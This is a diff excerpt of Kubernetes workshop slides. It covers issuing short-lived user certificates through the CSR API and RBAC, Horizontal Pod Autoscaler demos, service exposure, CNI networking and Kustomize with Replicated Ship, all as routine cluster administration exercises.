||||
(we can list them with e.g. `kubectl get csr`)
|
||||
|
||||
- We can create a CSR object
|
||||
|
||||
(= upload a CSR to the Kubernetes API)
|
||||
|
||||
- Then, using the Kubernetes API, we can approve / deny the request
|
||||
|
||||
- If we approve the request, the Kubernetes API generates a certificate
|
||||
|
||||
- The certificate gets attached to the CSR object and can be retrieved
|
||||
|
||||
---
|
||||
|
||||
## Using the CSR API
|
||||
|
||||
- We will show how to use the CSR API to obtain user certificates
|
||||
|
||||
- This will be a rather complex demo
|
||||
|
||||
- ... And yet, we will take a few shortcuts to simplify it
|
||||
|
||||
(but it will illustrate the general idea)
|
||||
|
||||
- The demo also won't be automated
|
||||
|
||||
(we would have to write extra code to make it fully functional)
|
||||
|
||||
---
|
||||
|
||||
## General idea
|
||||
|
||||
- We will create a Namespace named "users"
|
||||
|
||||
- Each user will get a ServiceAccount in that Namespace
|
||||
|
||||
- That ServiceAccount will give read/write access to *one* CSR object
|
||||
|
||||
- Users will use that ServiceAccount's token to submit a CSR
|
||||
|
||||
- We will approve the CSR (or not)
|
||||
|
||||
- Users can then retrieve their certificate from their CSR object
|
||||
|
||||
- ... And use that certificate for subsequent interactions
|
||||
|
||||
---
|
||||
|
||||
## Resource naming
|
||||
|
||||
For a user named `jean.doe`, we will have:
|
||||
|
||||
- ServiceAccount `jean.doe` in Namespace `users`
|
||||
|
||||
- CertificateSigningRequest `users:jean.doe`
|
||||
|
||||
- ClusterRole `users:jean.doe` giving read/write access to that CSR
|
||||
|
||||
- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
|
||||
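These resources are bundled in a YAML file in the repository; the ClusterRole is the interesting part, and might look roughly like this sketch (the actual file may differ in its details):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
# "create" requests cannot be restricted to a specific resource name
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create ]
# ... but read and update requests can
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  resourceNames: [ "users:jean.doe" ]
  verbs: [ get, update, delete ]
```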
|
||||
---
|
||||
|
||||
## Creating the user's resources
|
||||
|
||||
.warning[If you want to use a name other than `jean.doe`, update the YAML file!]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the global namespace for all users:
|
||||
```bash
|
||||
kubectl create namespace users
|
||||
```
|
||||
|
||||
- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Extracting the user's token
|
||||
|
||||
- Let's obtain the user's token and give it to them
|
||||
|
||||
(the token will be their password)
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the user's secrets:
|
||||
```bash
|
||||
kubectl --namespace=users describe serviceaccount jean.doe
|
||||
```
|
||||
|
||||
- Show the user's token:
|
||||
```bash
|
||||
kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Configure `kubectl` to use the token
|
||||
|
||||
- Let's create a new context that will use that token to access the API
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add a new identity to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials token:jean.doe --token=...
|
||||
```
|
||||
|
||||
- Add a new context using that identity:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Access the API with the token
|
||||
|
||||
- Let's check that our access rights are set properly
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to access any resource:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
(This should tell us "Forbidden")
|
||||
|
||||
- Try to access "our" CertificateSigningRequest:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe
|
||||
```
|
||||
(This should tell us "NotFound")
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create a key and a CSR
|
||||
|
||||
- There are many tools to generate TLS keys and CSRs
|
||||
|
||||
- Let's use OpenSSL; it's not the best one, but it's installed everywhere
|
||||
|
||||
(many people prefer cfssl, easyrsa, or other tools; that's fine too!)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate the key and certificate signing request:
|
||||
```bash
|
||||
openssl req -newkey rsa:2048 -nodes -keyout key.pem \
|
||||
-new -subj /CN=jean.doe/O=devs/ -out csr.pem
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The command above generates:
|
||||
|
||||
- a 2048-bit RSA key, without DES encryption, stored in key.pem
|
||||
- a CSR for the name `jean.doe` in group `devs`
|
||||
|
||||
---
|
||||
|
||||
## Inside the Kubernetes CSR object
|
||||
|
||||
- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
|
||||
|
||||
- The PEM file needs to be encoded to base64 on a single line
|
||||
|
||||
(we will use `base64 -w0` for that purpose)
|
||||
|
||||
- The Kubernetes CSR object also needs to list the right "usages"
|
||||
|
||||
(these are flags indicating how the certificate can be used)
|
||||
|
||||
---
|
||||
|
||||
## Sending the CSR to Kubernetes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate and create the CSR resource:
|
||||
```bash
|
||||
kubectl apply -f - <<EOF
|
||||
apiVersion: certificates.k8s.io/v1beta1
|
||||
kind: CertificateSigningRequest
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
spec:
|
||||
request: $(base64 -w0 < csr.pem)
|
||||
usages:
|
||||
- digital signature
|
||||
- key encipherment
|
||||
- client auth
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adjusting certificate expiration
|
||||
|
||||
- By default, the CSR API generates certificates valid for 1 year
|
||||
|
||||
- We want to generate short-lived certificates, so we will lower that to 1 hour
|
||||
|
||||
- For now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the static pod definition for the controller manager:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
|
||||
```
|
||||
|
||||
- In the list of flags, add the following line:
|
||||
```bash
|
||||
- --experimental-cluster-signing-duration=1h
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying and approving the CSR
|
||||
|
||||
- Let's inspect the CSR, and if it is valid, approve it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Inspect the CSR:
|
||||
```bash
|
||||
kubectl describe csr users:jean.doe
|
||||
```
|
||||
|
||||
- Approve it:
|
||||
```bash
|
||||
kubectl certificate approve users:jean.doe
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to the user's identity:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Retrieve the certificate from the CSR:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe \
|
||||
-o jsonpath={.status.certificate} \
|
||||
| base64 -d > cert.pem
|
||||
```
|
||||
|
||||
- Inspect the certificate:
|
||||
```bash
|
||||
openssl x509 -in cert.pem -text -noout
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the key and certificate to kubeconfig:
|
||||
```bash
|
||||
kubectl config set-credentials cert:jean.doe --embed-certs \
|
||||
--client-certificate=cert.pem --client-key=key.pem
|
||||
```
|
||||
|
||||
- Update the user's context to use the key and cert to authenticate:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user cert:jean.doe
|
||||
```
|
||||
|
||||
- Confirm that we are seen as `jean.doe` (but don't have permissions):
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's missing?
|
||||
|
||||
We have shown, step by step, a method to issue short-lived certificates for users.
|
||||
|
||||
To be usable in real environments, we would need to add:
|
||||
|
||||
- a kubectl helper to automatically generate the CSR and obtain the cert
|
||||
|
||||
(and transparently renew the cert when needed)
|
||||
|
||||
- a Kubernetes controller to automatically validate and approve CSRs
|
||||
|
||||
(checking that the subject and groups are valid)
|
||||
|
||||
- a way for the users to know the groups to add to their CSR
|
||||
|
||||
(e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
|
||||
|
||||
---
|
||||
|
||||
## Is this realistic?
|
||||
|
||||
- Larger organizations typically integrate with their own directory
|
||||
|
||||
- The general principle, however, is the same:
|
||||
|
||||
- users have long-term credentials (password, token, ...)
|
||||
|
||||
- they use these credentials to obtain other, short-lived credentials
|
||||
|
||||
- This provides enhanced security:
|
||||
|
||||
- the long-term credentials can use long passphrases, 2FA, HSM ...
|
||||
|
||||
- the short-term credentials are more convenient to use
|
||||
|
||||
- we get strong security *and* convenience
|
||||
|
||||
- Systems like Vault also have certificate issuance mechanisms
|
||||
@@ -73,18 +73,13 @@
|
||||
|
||||
- Dump the `rng` resource in YAML:
|
||||
```bash
|
||||
kubectl get deploy/rng -o yaml --export >rng.yml
|
||||
kubectl get deploy/rng -o yaml >rng.yml
|
||||
```
|
||||
|
||||
- Edit `rng.yml`
|
||||
|
||||
]
|
||||
|
||||
Note: `--export` will remove "cluster-specific" information, i.e.:
|
||||
- namespace (so that the resource is not tied to a specific namespace)
|
||||
- status and creation timestamp (useless when creating a new resource)
|
||||
- resourceVersion and uid (these would cause... *interesting* problems)
|
||||
|
||||
---
|
||||
|
||||
## "Casting" a resource to another
|
||||
|
||||
@@ -1,6 +1,20 @@
|
||||
## Declarative vs imperative in Kubernetes
|
||||
|
||||
- Virtually everything we create in Kubernetes is created from a *spec*
|
||||
- With Kubernetes, we cannot say: "run this container"
|
||||
|
||||
- All we can do is write a *spec* and push it to the API server
|
||||
|
||||
(by creating a resource like e.g. a Pod or a Deployment)
|
||||
|
||||
- The API server will validate that spec (and reject it if it's invalid)
|
||||
|
||||
- Then it will store it in etcd
|
||||
|
||||
- A *controller* will "notice" that spec and act upon it
|
||||
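For example, instead of saying "run this container", we push a spec like this minimal sketch, and let the controllers do the rest:

```bash
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: hello
spec:
  containers:
  - name: web
    image: nginx
EOF
```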
|
||||
---
|
||||
|
||||
## Reconciling state
|
||||
|
||||
- Watch for the `spec` fields in the YAML files later!
|
||||
|
||||
|
||||
67
slides/k8s/deploymentslideshow.md
Normal file
@@ -0,0 +1,67 @@
|
||||
## 19,000 words
|
||||
|
||||
They say, "a picture is worth one thousand words."
|
||||
|
||||
The following 19 slides show what really happens when we run:
|
||||
|
||||
```bash
|
||||
kubectl run web --image=nginx --replicas=3
|
||||
```
|
||||
|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
@@ -61,7 +61,7 @@ There are many possibilities!
|
||||
|
||||
- creates a new custom type, `Remote`, exposing a git+ssh server
|
||||
|
||||
- deploy by pushing YAML or Helm Charts to that remote
|
||||
- deploy by pushing YAML or Helm charts to that remote
|
||||
|
||||
- Replacing built-in types with CRDs
|
||||
|
||||
@@ -87,7 +87,11 @@ There are many possibilities!
|
||||
|
||||
(and take action when they are created/updated)
|
||||
|
||||
*Example: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml)*
|
||||
*
|
||||
Examples:
|
||||
[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
|
||||
[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)
|
||||
*
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -234,6 +234,6 @@
|
||||
|
||||
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
|
||||
|
||||
- Gitkube can also deploy Helm Charts
|
||||
- Gitkube can also deploy Helm charts
|
||||
|
||||
(instead of raw YAML files)
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Healthchecks
|
||||
# Healthchecks (extra material)
|
||||
|
||||
- Kubernetes provides two kinds of healthchecks: liveness and readiness
|
||||
|
||||
|
||||
@@ -176,77 +176,3 @@ The chart's metadata includes an URL to the project's home page.
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Creating a chart
|
||||
|
||||
- We are going to show a way to create a *very simplified* chart
|
||||
|
||||
- In a real chart, *lots of things* would be templatized
|
||||
|
||||
(Resource names, service types, number of replicas...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a sample chart:
|
||||
```bash
|
||||
helm create dockercoins
|
||||
```
|
||||
|
||||
- Move away the sample templates and create an empty template directory:
|
||||
```bash
|
||||
mv dockercoins/templates dockercoins/default-templates
|
||||
mkdir dockercoins/templates
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Exporting the YAML for our application
|
||||
|
||||
- The following section assumes that DockerCoins is currently running
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create one YAML file for each resource that we need:
|
||||
.small[
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
daemonset rng
|
||||
deployment webui
|
||||
deployment redis
|
||||
service hasher
|
||||
service rng
|
||||
service webui
|
||||
service redis
|
||||
EOF
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our helm chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's install our helm chart! (`dockercoins` is the path to the chart)
|
||||
```
|
||||
helm install dockercoins
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- Since the application is already deployed, this will fail:<br>
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
245
slides/k8s/horizontal-pod-autoscaler.md
Normal file
@@ -0,0 +1,245 @@
|
||||
# The Horizontal Pod Autoscaler
|
||||
|
||||
- What is the Horizontal Pod Autoscaler, or HPA?
|
||||
|
||||
- It is a controller that can perform *horizontal* scaling automatically
|
||||
|
||||
- Horizontal scaling = changing the number of replicas
|
||||
|
||||
(adding / removing pods)
|
||||
|
||||
- Vertical scaling = changing the size of individual replicas
|
||||
|
||||
(increasing / reducing CPU and RAM per pod)
|
||||
|
||||
- Cluster scaling = changing the size of the cluster
|
||||
|
||||
(adding / removing nodes)
|
||||
|
||||
---
|
||||
|
||||
## Principle of operation
|
||||
|
||||
- Each HPA resource (or "policy") specifies:
|
||||
|
||||
- which object to monitor and scale (e.g. a Deployment, ReplicaSet...)
|
||||
|
||||
- min/max scaling ranges (the max is a safety limit!)
|
||||
|
||||
- a target resource usage (e.g. the default is CPU=80%)
|
||||
|
||||
- The HPA continuously monitors the CPU usage for the related object
|
||||
|
||||
- It computes how many pods should be running:
|
||||
|
||||
`TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`
|
||||
|
||||
- It scales up/down the related object to this target number of pods
|
||||
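- For example, if 3 pods each use 100% of their CPU request, and the target is 80%:

  `ceil((100 + 100 + 100) / 80) = ceil(3.75) = 4 pods`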
|
||||
---
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- The metrics server needs to be running
|
||||
|
||||
(i.e. we need to be able to see pod metrics with `kubectl top pods`)
|
||||
|
||||
- The pods that we want to autoscale need to have resource requests
|
||||
|
||||
(because the target CPU% is not absolute, but relative to the request)
|
||||
|
||||
- The latter actually makes a lot of sense:
|
||||
|
||||
- if a Pod doesn't have a CPU request, it might be using 10% of CPU ...
|
||||
|
||||
- ... but only because there is no CPU time available!
|
||||
|
||||
- this makes sure that we won't add pods to nodes that are already resource-starved
|
||||
|
||||
---
|
||||
|
||||
## Testing the HPA
|
||||
|
||||
- We will start a CPU-intensive web service
|
||||
|
||||
- We will send some traffic to that service
|
||||
|
||||
- We will create an HPA policy
|
||||
|
||||
- The HPA will automatically scale up the service for us
|
||||
|
||||
---
|
||||
|
||||
## A CPU-intensive web service
|
||||
|
||||
- Let's use `jpetazzo/busyhttp`
|
||||
|
||||
(it is a web server that will use 1s of CPU for each HTTP request)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy the web server:
|
||||
```bash
|
||||
kubectl create deployment busyhttp --image=jpetazzo/busyhttp
|
||||
```
|
||||
|
||||
- Expose it with a ClusterIP service:
|
||||
```bash
|
||||
kubectl expose deployment busyhttp --port=80
|
||||
```
|
||||
|
||||
- Get the ClusterIP allocated to the service:
|
||||
```bash
|
||||
kubectl get svc busyhttp
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Monitor what's going on
|
||||
|
||||
- Let's start a bunch of commands to watch what is happening
|
||||
|
||||
.exercise[
|
||||
|
||||
- Monitor pod CPU usage:
|
||||
```bash
|
||||
watch kubectl top pods
|
||||
```
|
||||
|
||||
- Monitor service latency:
|
||||
```bash
|
||||
httping http://`ClusterIP`/
|
||||
```
|
||||
|
||||
- Monitor cluster events:
|
||||
```bash
|
||||
kubectl get events -w
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Send traffic to the service
|
||||
|
||||
- We will use `ab` (Apache Bench) to send traffic
|
||||
|
||||
.exercise[
|
||||
|
||||
- Send a lot of requests to the service, with a concurrency level of 3:
|
||||
```bash
|
||||
ab -c 3 -n 100000 http://`ClusterIP`/
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The latency (reported by `httping`) should increase above 3s.
|
||||
|
||||
The CPU utilization should increase to 100%.
|
||||
|
||||
(The server is single-threaded and won't go above 100%.)
|
||||
|
||||
---
|
||||
|
||||
## Create an HPA policy
|
||||
|
||||
- There is a helper command to do that for us: `kubectl autoscale`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the HPA policy for the `busyhttp` deployment:
|
||||
```bash
|
||||
kubectl autoscale deployment busyhttp --max=10
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
By default, it will assume a target of 80% CPU usage.
|
||||
|
||||
This can also be set with `--cpu-percent=`.
|
||||
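Under the hood, this creates an HPA resource roughly equivalent to this sketch (using the `autoscaling/v1` schema):

```bash
kubectl apply -f - <<EOF
apiVersion: autoscaling/v1
kind: HorizontalPodAutoscaler
metadata:
  name: busyhttp
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: busyhttp
  minReplicas: 1
  maxReplicas: 10
  targetCPUUtilizationPercentage: 80
EOF
```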
|
||||
--
|
||||
|
||||
*The autoscaler doesn't seem to work. Why?*
|
||||
|
||||
---
|
||||
|
||||
## What did we miss?
|
||||
|
||||
- The events stream gives us a hint, but to be honest, it's not very clear:
|
||||
|
||||
`missing request for cpu`
|
||||
|
||||
- We forgot to specify a resource request for our Deployment!
|
||||
|
||||
- The HPA target is not an absolute CPU%
|
||||
|
||||
- It is relative to the CPU requested by the pod
|
||||
|
||||
---
|
||||
|
||||
## Adding a CPU request
|
||||
|
||||
- Let's edit the deployment and add a CPU request
|
||||
|
||||
- Since our server can use up to 1 core, let's request 1 core
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the Deployment definition:
|
||||
```bash
|
||||
kubectl edit deployment busyhttp
|
||||
```
|
||||
|
||||
- In the `containers` list, add the following block:
|
||||
```yaml
|
||||
resources:
|
||||
requests:
|
||||
cpu: "1"
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
- After saving and quitting, a rolling update happens
|
||||
|
||||
(if `ab` or `httping` exits, make sure to restart it)
|
||||
|
||||
- It will take a minute or two for the HPA to kick in:
|
||||
|
||||
- the HPA runs every 30 seconds by default
|
||||
|
||||
- it needs to gather metrics from the metrics server first
|
||||
|
||||
- If we scale further up (or down), the HPA will react after a few minutes:
|
||||
|
||||
- it won't scale up if it already scaled in the last 3 minutes
|
||||
|
||||
- it won't scale down if it already scaled in the last 5 minutes
|
||||
|
||||
---
|
||||
|
||||
## What about other metrics?
|
||||
|
||||
- The HPA in API group `autoscaling/v1` only supports CPU scaling
|
||||
|
||||
- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:
|
||||
|
||||
- metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)
|
||||
|
||||
- custom.metrics.k8s.io, custom metrics per Pod
|
||||
|
||||
- external.metrics.k8s.io, external metrics (not associated to Pods)
|
||||
|
||||
- Kubernetes doesn't implement any of these API groups
|
||||
|
||||
- Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)
|
||||
|
||||
- The metrics provided by metrics server are standard; everything else is custom
|
||||
|
||||
- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)
|
||||
@@ -276,3 +276,21 @@ error: the server doesn't have a resource type "endpoint"
|
||||
- There is no `endpoint` object: `type Endpoints struct`
|
||||
|
||||
- The type doesn't represent a single endpoint, but a list of endpoints
|
||||
|
||||
---
|
||||
|
||||
## Exposing services to the outside world
|
||||
|
||||
- The default type (ClusterIP) only works for internal traffic
|
||||
|
||||
- If we want to accept external traffic, we can use one of these:
|
||||
|
||||
- NodePort (expose a service on a TCP port between 30000-32768)
|
||||
|
||||
- LoadBalancer (provision a cloud load balancer for our service)
|
||||
|
||||
- ExternalIP (use one node's external IP address)
|
||||
|
||||
- Ingress (a special mechanism for HTTP services)
|
||||
|
||||
*We'll see NodePorts and Ingresses more in detail later.*
|
||||
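As a quick sketch, exposing a deployment through a NodePort looks like this (assuming a deployment named `web` exists):

```bash
# Create a NodePort service in front of the deployment
kubectl expose deployment web --type=NodePort --port=80

# Check which port (in the 30000-32768 range) was allocated
kubectl get service web
```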
|
||||
@@ -79,6 +79,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Exploring types and definitions
|
||||
|
||||
- We can list all available resource types by running `kubectl api-resources`
|
||||
@@ -102,9 +104,11 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Introspection vs. documentation
|
||||
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.14/)
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)
|
||||
|
||||
- The API documentation is usually easier to read, but:
|
||||
|
||||
|
||||
@@ -320,6 +320,8 @@ We could! But the *deployment* would notice it right away, and scale back to the
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
### Streaming logs of many pods
|
||||
|
||||
- Let's see what happens if we try to stream the logs for more than 5 pods
|
||||
@@ -347,6 +349,8 @@ use --max-log-requests to increase the limit
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Why can't we stream the logs of many pods?
|
||||
|
||||
- `kubectl` opens one connection to the API server per pod
|
||||
|
||||
@@ -16,6 +16,8 @@
|
||||
|
||||
- each pod is aware of its IP address (no NAT)
|
||||
|
||||
- pod IP addresses are assigned by the network implementation
|
||||
|
||||
- Kubernetes doesn't mandate any particular implementation
|
||||
|
||||
---
|
||||
@@ -30,7 +32,7 @@
|
||||
|
||||
- No new protocol
|
||||
|
||||
- Pods cannot move from a node to another and keep their IP address
|
||||
- The network implementation can decide how to allocate addresses
|
||||
|
||||
- IP addresses don't have to be "portable" from a node to another
|
||||
|
||||
@@ -82,13 +84,17 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The Container Network Interface (CNI)
|
||||
|
||||
- The CNI has a well-defined [specification](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration) for network plugins
|
||||
- Most Kubernetes clusters use CNI "plugins" to implement networking
|
||||
|
||||
- When a pod is created, Kubernetes delegates the network setup to CNI plugins
|
||||
- When a pod is created, Kubernetes delegates the network setup to these plugins
|
||||
|
||||
- Typically, a CNI plugin will:
|
||||
(it can be a single plugin, or a combination of plugins, each doing one task)
|
||||
|
||||
- Typically, CNI plugins will:
|
||||
|
||||
- allocate an IP address (by calling an IPAM plugin)
|
||||
|
||||
@@ -96,8 +102,46 @@
|
||||
|
||||
- configure the interface as well as required routes etc.
|
||||
|
||||
- Using multiple plugins can be done with "meta-plugins" like CNI-Genie or Multus
|
||||
---
|
||||
|
||||
- Not all CNI plugins are equal
|
||||
class: extra-details
|
||||
|
||||
(e.g. they don't all implement network policies, which are required to isolate pods)
|
||||
## Multiple moving parts
|
||||
|
||||
- The "pod-to-pod network" or "pod network":
|
||||
|
||||
- provides communication between pods and nodes
|
||||
|
||||
- is generally implemented with CNI plugins
|
||||
|
||||
- The "pod-to-service network":
|
||||
|
||||
- provides internal communication and load balancing
|
||||
|
||||
- is generally implemented with kube-proxy (or e.g. kube-router)
|
||||
|
||||
- Network policies:
|
||||
|
||||
- provide firewalling and isolation
|
||||
|
||||
- can be bundled with the "pod network" or provided by another component
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Even more moving parts
|
||||
|
||||
- Inbound traffic can be handled by multiple components:
|
||||
|
||||
- something like kube-proxy or kube-router (for NodePort services)
|
||||
|
||||
- load balancers (ideally, connected to the pod network)
|
||||
|
||||
- It is possible to use multiple pod networks in parallel
|
||||
|
||||
(with "meta-plugins" like CNI-Genie or Multus)
|
||||
|
||||
- Some solutions can fill multiple roles
|
||||
|
||||
(e.g. kube-router can be set up to provide the pod network and/or network policies and/or replace kube-proxy)
|
||||
|
||||
194
slides/k8s/kustomize.md
Normal file
@@ -0,0 +1,194 @@
|
||||
# Kustomize
|
||||
|
||||
- Kustomize lets us transform YAML files representing Kubernetes resources
|
||||
|
||||
- The original YAML files are valid resource files
|
||||
|
||||
(e.g. they can be loaded with `kubectl apply -f`)
|
||||
|
||||
- They are left untouched by Kustomize
|
||||
|
||||
- Kustomize lets us define *overlays* that extend or change the resource files
|
||||
|
||||
---
|
||||
|
||||
## Differences with Helm
|
||||
|
||||
- Helm charts use placeholders `{{ like.this }}`
|
||||
|
||||
- Kustomize "bases" are standard Kubernetes YAML
|
||||
|
||||
- It is possible to use an existing set of YAML as a Kustomize base
|
||||
|
||||
- As a result, writing a Helm chart is more work ...
|
||||
|
||||
- ... But Helm charts are also more powerful; e.g. they can:
|
||||
|
||||
- use flags to conditionally include resources or blocks
|
||||
|
||||
- check if a given Kubernetes API group is supported
|
||||
|
||||
- [and much more](https://helm.sh/docs/chart_template_guide/)
|
||||
|
||||
---
|
||||
|
||||
## Kustomize concepts
|
||||
|
||||
- Kustomize needs a `kustomization.yaml` file
|
||||
|
||||
- That file can be a *base* or a *variant*
|
||||
|
||||
- If it's a *base*:
|
||||
|
||||
- it lists YAML resource files to use
|
||||
|
||||
- If it's a *variant* (or *overlay*):
|
||||
|
||||
- it refers to (at least) one *base*
|
||||
|
||||
- and some *patches*
|
||||
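As a minimal sketch, a base and a variant could look like this (paths and patch file names are made up for illustration; the field names are those of Kustomize at the time of writing):

```yaml
# base/kustomization.yaml
resources:
- deployment.yaml
- service.yaml
```

```yaml
# overlay/kustomization.yaml (a variant referencing the base)
bases:
- ../base
patchesStrategicMerge:
- set-replicas.yaml
```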
|
||||
---
|
||||
|
||||
## An easy way to get started with Kustomize
|
||||
|
||||
- We are going to use [Replicated Ship](https://www.replicated.com/ship/) to experiment with Kustomize
|
||||
|
||||
- The [Replicated Ship CLI](https://github.com/replicatedhq/ship/releases) has been installed on our clusters
|
||||
|
||||
- Replicated Ship has multiple workflows; here is what we will do:
|
||||
|
||||
- initialize a Kustomize overlay from a remote GitHub repository
|
||||
|
||||
- customize some values using the web UI provided by Ship
|
||||
|
||||
- look at the resulting files and apply them to the cluster
|
||||
|
||||
---
|
||||
|
||||
## Getting started with Ship
|
||||
|
||||
- We need to run `ship init` in a new directory
|
||||
|
||||
- `ship init` requires a URL to a remote repository containing Kubernetes YAML
|
||||
|
||||
- It will clone that repository and start a web UI
|
||||
|
||||
- Later, it can watch that repository and/or update from it
|
||||
|
||||
- We will use the [jpetazzo/kubercoins](https://github.com/jpetazzo/kubercoins) repository
|
||||
|
||||
(it contains all the DockerCoins resources as YAML files)
|
||||
|
||||
---
|
||||
|
||||
## `ship init`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Change to a new directory:
|
||||
```bash
|
||||
mkdir ~/kustomcoins
|
||||
cd ~/kustomcoins
|
||||
```
|
||||
|
||||
- Run `ship init` with the kubercoins repository:
|
||||
```bash
|
||||
ship init https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
